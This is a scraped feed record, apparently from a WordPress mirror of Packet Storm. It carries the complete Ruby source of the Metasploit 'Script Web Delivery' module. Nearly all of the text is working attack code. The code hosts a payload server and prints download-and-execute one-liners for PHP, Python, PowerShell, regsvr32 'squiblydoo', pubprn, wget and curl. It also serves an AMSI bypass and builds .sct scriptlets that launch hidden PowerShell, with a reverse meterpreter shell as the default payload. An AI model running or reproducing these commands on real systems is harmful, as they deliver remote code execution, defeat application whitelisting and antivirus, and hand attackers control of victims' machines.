{“lastseen”:”2025-08-28T16:37:30″,”description”:”This Metasploit module quickly fires up a web server that serves a payload. The module will provide a command to…”,”published”:”2025-08-28T00:00:00″,”modified”:”2025-08-28T00:00:00″,”type”:”packetstorm”,”title”:”\ud83d\udcc4 Script Web Delivery”,”source”:””,”references”:””,”id”:”PACKETSTORM:208942″,”bulletinFamily”:”exploit”,”cwe”:null,”cvelist”:[],”sourceData”:”##\\n # This module requires Metasploit: https:\/\/metasploit.com\/download\\n # Current source: https:\/\/github.com\/rapid7\/metasploit-framework\\n ##\\n \\n class MetasploitModule \\u003c Msf::Exploit::Remote\\n Rank = ManualRanking\\n \\n include Msf::Exploit::EXE\\n include Msf::Exploit::Powershell\\n include Msf::Exploit::Remote::HttpServer\\n \\n def initialize(info = {})\\n super(\\n update_info(\\n info,\\n ‘Name’ =\\u003e ‘Script Web Delivery’,\\n ‘Description’ =\\u003e %q{\\n This module quickly fires up a web server that serves a payload.\\n \\n The module will provide a command to be run on the target machine\\n based on the selected target. The provided command will download\\n and execute a payload using either a specified scripting language\\n interpreter or \\”squiblydoo\\” via regsvr32.exe for bypassing\\n application whitelisting.\\n \\n The main purpose of this module is to quickly establish a session on a\\n target machine when the attacker has to manually type in the command:\\n e.g. Command Injection, RDP Session, Local Access or maybe Remote\\n Command Execution.\\n \\n This attack vector does not write to disk so it is less likely to\\n trigger AV solutions and will allow privilege escalations supplied\\n by Meterpreter.\\n \\n When using either of the PSH targets, ensure the payload architecture\\n matches the target computer or use SYSWOW64 powershell.exe to execute\\n x86 payloads on x64 machines.\\n \\n Regsvr32 uses \\”squiblydoo\\” technique to bypass application whitelisting.\\n The signed Microsoft binary file, Regsvr32, is able to request an .sct\\n file and then execute the included PowerShell command inside of it.\\n \\n Similarly, the pubprn target uses the pubprn.vbs script to request and\\n execute a .sct file.\\n \\n Both web requests (i.e., the .sct file and PowerShell download\/execute)\\n can occur on the same port.\\n \\n The SyncAppvPublishingServer target uses SyncAppvPublishingServer.exe\\n Microsoft signed binary to request and execute a PowerShell script. This\\n technique only works on Windows 10 builds \\u003c= 1709.\\n \\n \\”PSH (Binary)\\” will write a file to the disk, allowing for custom binaries\\n to be served up to be downloaded and executed.\\n },\\n ‘License’ =\\u003e MSF_LICENSE,\\n ‘Author’ =\\u003e [\\n ‘Andrew Smith \\”jakx\\” \\u003cjakx.ppr@gmail.com\\u003e’,\\n ‘Ben Campbell’,\\n ‘Chris Campbell’, # @obscuresec – Inspiration n.b. no relation!\\n ‘Casey Smith’, # AppLocker bypass research and vulnerability discovery (@subTee)\\n ‘Trenton Ivey’, # AppLocker MSF Module (kn0)\\n ‘g0tmi1k’, # @g0tmi1k \/\/ https:\/\/blog.g0tmi1k.com\/ – additional features\\n ‘bcoles’, # support for targets: pubprn, SyncAppvPublishingServer and Linux wget\\n ‘Matt Nelson’, # @enigma0x3 \/\/ pubprn discovery\\n ‘phra’, # @phraaaaaaa \/\/ https:\/\/iwantmore.pizza\/ – AMSI\/SBL bypass\\n ‘Nick Landers’, # @monoxgas \/\/ SyncAppvPublishingServer discovery\\n ],\\n ‘DefaultOptions’ =\\u003e {\\n ‘Payload’ =\\u003e ‘python\/meterpreter\/reverse_tcp’,\\n ‘Powershell::exec_in_place’ =\\u003e true\\n },\\n ‘References’ =\\u003e [\\n [‘URL’, ‘https:\/\/securitypadawan.blogspot.com\/2014\/02\/php-meterpreter-web-delivery.html’],\\n [‘URL’, ‘https:\/\/www.pentestgeek.com\/2013\/07\/19\/invoke-shellcode\/’],\\n [‘URL’, ‘http:\/\/www.powershellmagazine.com\/2013\/04\/19\/pstip-powershell-command-line-switches-shortcuts\/’],\\n [‘URL’, ‘https:\/\/www.darkoperator.com\/blog\/2013\/3\/21\/powershell-basics-execution-policy-and-code-signing-part-2.html’],\\n [‘URL’, ‘http:\/\/web.archive.org\/web\/20171026182440\/http:\/\/subt0x10.blogspot.com:80\/2017\/04\/bypass-application-whitelisting-script.html’],\\n [‘URL’, ‘https:\/\/enigma0x3.net\/2017\/08\/03\/wsh-injection-a-case-study\/’],\\n [‘URL’, ‘https:\/\/iwantmore.pizza\/posts\/amsi.html’],\\n [‘URL’, ‘https:\/\/lolbas-project.github.io\/lolbas\/Binaries\/Regsvr32\/’],\\n [‘URL’, ‘https:\/\/lolbas-project.github.io\/lolbas\/Binaries\/Syncappvpublishingserver\/’],\\n [‘URL’, ‘https:\/\/lolbas-project.github.io\/lolbas\/Scripts\/Pubprn\/’],\\n ],\\n ‘Platform’ =\\u003e %w[python php win linux osx],\\n ‘Targets’ =\\u003e [\\n [\\n ‘Python’, {\\n ‘Platform’ =\\u003e ‘python’,\\n ‘Arch’ =\\u003e ARCH_PYTHON\\n }\\n ],\\n [\\n ‘PHP’, {\\n ‘Platform’ =\\u003e ‘php’,\\n ‘Arch’ =\\u003e ARCH_PHP\\n }\\n ],\\n [\\n ‘PSH’, {\\n ‘Platform’ =\\u003e ‘win’,\\n ‘Arch’ =\\u003e [ARCH_X86, ARCH_X64]\\n }\\n ],\\n [\\n ‘Regsvr32’, {\\n ‘Platform’ =\\u003e ‘win’,\\n ‘Arch’ =\\u003e [ARCH_X86, ARCH_X64]\\n }\\n ],\\n [\\n ‘pubprn’, {\\n ‘Platform’ =\\u003e ‘win’,\\n ‘Arch’ =\\u003e [ARCH_X86, ARCH_X64]\\n }\\n ],\\n [\\n ‘SyncAppvPublishingServer’, {\\n ‘Platform’ =\\u003e ‘win’,\\n ‘Arch’ =\\u003e [ARCH_X86, ARCH_X64]\\n }\\n ],\\n [\\n ‘PSH (Binary)’, {\\n ‘Platform’ =\\u003e ‘win’,\\n ‘Arch’ =\\u003e [ARCH_X86, ARCH_X64]\\n }\\n ],\\n [\\n ‘Linux’, {\\n ‘Platform’ =\\u003e ‘linux’,\\n ‘Arch’ =\\u003e [ARCH_X86, ARCH_X64]\\n }\\n ],\\n [\\n ‘Mac OS X’, {\\n ‘Platform’ =\\u003e ‘osx’,\\n ‘Arch’ =\\u003e [ARCH_X86, ARCH_X64]\\n }\\n ],\\n ],\\n ‘DefaultTarget’ =\\u003e 0,\\n ‘DisclosureDate’ =\\u003e ‘2013-07-19’,\\n ‘Notes’ =\\u003e {\\n ‘Reliability’ =\\u003e UNKNOWN_RELIABILITY,\\n ‘Stability’ =\\u003e UNKNOWN_STABILITY,\\n ‘SideEffects’ =\\u003e UNKNOWN_SIDE_EFFECTS\\n }\\n )\\n )\\n \\n register_advanced_options(\\n [\\n OptBool.new(‘PSH-AmsiBypass’, [ true, ‘PSH – Request AMSI\/SBL bypass before the stager’, true ]),\\n OptString.new(‘PSH-AmsiBypassURI’, [ false, ‘PSH – The URL to use for the AMSI\/SBL bypass (Will be random if left blank)’, ” ]),\\n OptBool.new(‘PSH-EncodedCommand’, [ true, ‘PSH – Use -EncodedCommand for web_delivery launcher’, true ]),\\n OptBool.new(‘PSH-ForceTLS12’, [ true, ‘PSH – Force use of TLS v1.2’, true ]),\\n OptBool.new(‘PSH-Proxy’, [ true, ‘PSH – Use the system proxy’, true ]),\\n OptString.new(‘PSHBinary-PATH’, [ false, ‘PSH (Binary) – The folder to store the file on the target machine (Will be %TEMP% if left blank)’, ” ]),\\n OptString.new(‘PSHBinary-FILENAME’, [ false, ‘PSH (Binary) – The filename to use (Will be random if left blank)’, ” ]),\\n ]\\n )\\n end\\n \\n def primer\\n print_status(‘Run the following command on the target machine:’)\\n \\n case target.name\\n when ‘PHP’\\n print_line(%(php -d allow_url_fopen=true -r \\”eval(file_get_contents(‘#{get_uri}’, false, stream_context_create([‘ssl’=\\u003e[‘verify_peer’=\\u003efalse,’verify_peer_name’=\\u003efalse]])));\\”))\\n when ‘Python’\\n print_line(%(python -c \\”import sys;import ssl;u=__import__(‘urllib’+{2:”,3:’.request’}[sys.version_info[0]],fromlist=(‘urlopen’,));r=u.urlopen(‘#{get_uri}’, context=ssl._create_unverified_context());exec(r.read());\\”))\\n when ‘PSH’\\n uri = get_uri\\n if datastore[‘PSH-AmsiBypass’]\\n amsi_uri = uri + amsi_bypass_uri\\n print_line(gen_psh([amsi_uri, uri], ‘string’).to_s)\\n else\\n print_line(gen_psh(uri, ‘string’).to_s)\\n end\\n when ‘pubprn’\\n print_line(%(C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\Printing_Admin_Scripts\\\\\\\\en-US\\\\\\\\pubprn.vbs 127.0.0.1 script:#{get_uri}.sct))\\n when ‘SyncAppvPublishingServer’\\n print_line(%(SyncAppvPublishingServer.exe \\”n;(New-Object Net.WebClient).DownloadString(‘#{get_uri}’) | IEX\\”))\\n when ‘Regsvr32’\\n print_line(%(regsvr32 \/s \/n \/u \/i:#{get_uri}.sct scrobj.dll))\\n when ‘PSH (Binary)’\\n psh = gen_psh(get_uri.to_s, ‘download’)\\n print_line(psh.to_s)\\n when ‘Linux’\\n fname = Rex::Text.rand_text_alphanumeric(8)\\n print_line(\\”wget -qO #{fname} –no-check-certificate #{get_uri}; chmod +x #{fname}; .\/#{fname}\\u0026 disown\\”)\\n when ‘Mac OS X’\\n fname = Rex::Text.rand_text_alphanumeric(8)\\n print_line(\\”curl -sk –output #{fname} #{get_uri}; chmod +x #{fname}; .\/#{fname}\\u0026 disown\\”)\\n end\\n end\\n \\n def amsi_bypass_uri\\n unless datastore[‘PSH-AmsiBypassURI’].empty?\\n @amsi_uri = datastore[‘PSH-AmsiBypassURI’]\\n end\\n @amsi_uri ||= random_uri\\n end\\n \\n def on_request_uri(cli, request)\\n if request.raw_uri.to_s.ends_with?(‘.sct’)\\n print_status(‘Handling .sct Request’)\\n psh = gen_psh(get_uri.to_s, ‘string’)\\n \\n case target.name\\n when ‘pubprn’\\n data = gen_pubprn_sct_file(psh)\\n when ‘Regsvr32’\\n data = gen_sct_file(psh)\\n else\\n print_error(‘Unexpected request for .sct file’)\\n end\\n \\n send_response(cli, data, ‘Content-Type’ =\\u003e ‘text\/plain’)\\n return\\n end\\n \\n if request.raw_uri.to_s.ends_with?(amsi_bypass_uri)\\n data = bypass_powershell_protections\\n print_status(\\”Delivering AMSI Bypass (#{data.length} bytes)\\”)\\n send_response(cli, data, ‘Content-Type’ =\\u003e ‘text\/plain’)\\n return\\n end\\n \\n case target.name\\n when ‘Linux’, ‘Mac OS X’, ‘PSH (Binary)’\\n data = generate_payload_exe\\n when ‘PSH’, ‘Regsvr32’, ‘pubprn’, ‘SyncAppvPublishingServer’\\n data = cmd_psh_payload(\\n payload.encoded,\\n payload_instance.arch.first\\n )\\n else\\n data = payload.encoded.to_s\\n end\\n \\n print_status(\\”Delivering Payload (#{data.length} bytes)\\”)\\n send_response(cli, data, ‘Content-Type’ =\\u003e ‘application\/octet-stream’)\\n end\\n \\n def gen_psh(url, *method)\\n ignore_cert = Rex::Powershell::PshMethods.ignore_ssl_certificate if ssl\\n force_tls12 = Rex::Powershell::PshMethods.force_tls12 if datastore[‘PSH-ForceTLS12’]\\n \\n if method.include? ‘string’\\n download_string = datastore[‘PSH-Proxy’] ? Rex::Powershell::PshMethods.proxy_aware_download_and_exec_string(url) : Rex::Powershell::PshMethods.download_and_exec_string(url)\\n else\\n # Random filename to use, if there isn’t anything set\\n random = \\”#{rand_text_alphanumeric(8)}.exe\\”\\n \\n # Set filename (Use random filename if empty)\\n filename = datastore[‘PSHBinary-FILENAME’].blank? ? random : datastore[‘PSHBinary-FILENAME’]\\n \\n # Set path (Use %TEMP% if empty)\\n path = datastore[‘PSHBinary-PATH’].blank? ? ‘$env:temp’ : %(‘#{datastore[‘PSHBinary-PATH’]}’)\\n \\n # Join Path and Filename\\n file = %(echo (#{path}+’\\\\\\\\#{filename}’))\\n \\n # Generate download PowerShell command\\n download_string = Rex::Powershell::PshMethods.download_run(url, file)\\n end\\n \\n download_and_run = \\”#{force_tls12}#{ignore_cert}#{download_string}\\”\\n \\n # Generate main PowerShell command\\n if datastore[‘PSH-EncodedCommand’]\\n download_and_run = encode_script(download_and_run)\\n return generate_psh_command_line(noprofile: true, windowstyle: ‘hidden’, encodedcommand: download_and_run)\\n end\\n \\n return generate_psh_command_line(noprofile: true, windowstyle: ‘hidden’, command: download_and_run)\\n end\\n \\n def rand_class_id\\n \\”#{Rex::Text.rand_text_hex(8)}-#{Rex::Text.rand_text_hex(4)}-#{Rex::Text.rand_text_hex(4)}-#{Rex::Text.rand_text_hex(4)}-#{Rex::Text.rand_text_hex(12)}\\”\\n end\\n \\n def gen_sct_file(command)\\n %{\\u003c?XML version=\\”1.0\\”?\\u003e\\u003cscriptlet\\u003e\\u003cregistration progid=\\”#{rand_text_alphanumeric(8)}\\” classid=\\”{#{rand_class_id}}\\”\\u003e\\u003cscript\\u003e\\u003c![CDATA[ var r = new ActiveXObject(\\”WScript.Shell\\”).Run(\\”#{command}\\”,0);]]\\u003e\\u003c\/script\\u003e\\u003c\/registration\\u003e\\u003c\/scriptlet\\u003e}\\n end\\n \\n def gen_pubprn_sct_file(command)\\n %{\\u003c?XML version=\\”1.0\\”?\\u003e\\u003cscriptlet\\u003e\\u003cregistration progid=\\”#{rand_text_alphanumeric(8)}\\” classid=\\”{#{rand_class_id}}\\” remotable=\\”true\\”\\u003e\\u003c\/registration\\u003e\\u003cscript\\u003e\\u003c![CDATA[ var r = new ActiveXObject(\\”WScript.Shell\\”).Run(\\”#{command}\\”,0);]]\\u003e\\u003c\/script\\u003e\\u003c\/scriptlet\\u003e}\\n end\\n end”,”sourceHref”:”https:\/\/packetstorm.news\/download\/208942″,”cvss”:{“score”:0,”severity”:”NONE”,”vector”:”NONE”,”version”:”NONE”},”cvss2″:{},”cvss3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””,”cvssV3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””}},”href”:”https:\/\/packetstorm.news\/files\/id\/208942\/”,”category_name”:”Exploit”,”post_link”:””,”product”:””,”version”:””,”vendor”:””,”ai_description”:””,”ai_severity”:””,”ai_vendor”:””,”ai_product”:””,”ai_version”:””,”ai_score”:0}<\/p>\n","protected":false},"excerpt":{"rendered":"
{“lastseen”:”2025-08-28T16:37:30″,”description”:”This Metasploit module quickly fires up a web server that serves a payload. The module will provide a command to…”,”published”:”2025-08-28T00:00:00″,”modified”:”2025-08-28T00:00:00″,”type”:”packetstorm”,”title”:”\ud83d\udcc4 Script Web Delivery”,”source”:””,”references”:””,”id”:”PACKETSTORM:208942″,”bulletinFamily”:”exploit”,”cwe”:null,”cvelist”:[],”sourceData”:”##\\n # This…<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3],"tags":[6,8,12,13,33,53,7,11,5],"class_list":["post-14814","post","type-post","status-publish","format-standard","hentry","category-category_exploit","tag-cve","tag-cvss","tag-exploit","tag-news","tag-none","tag-packetstorm","tag-security","tag-tapic","tag-vulnerability"],"yoast_head":"\n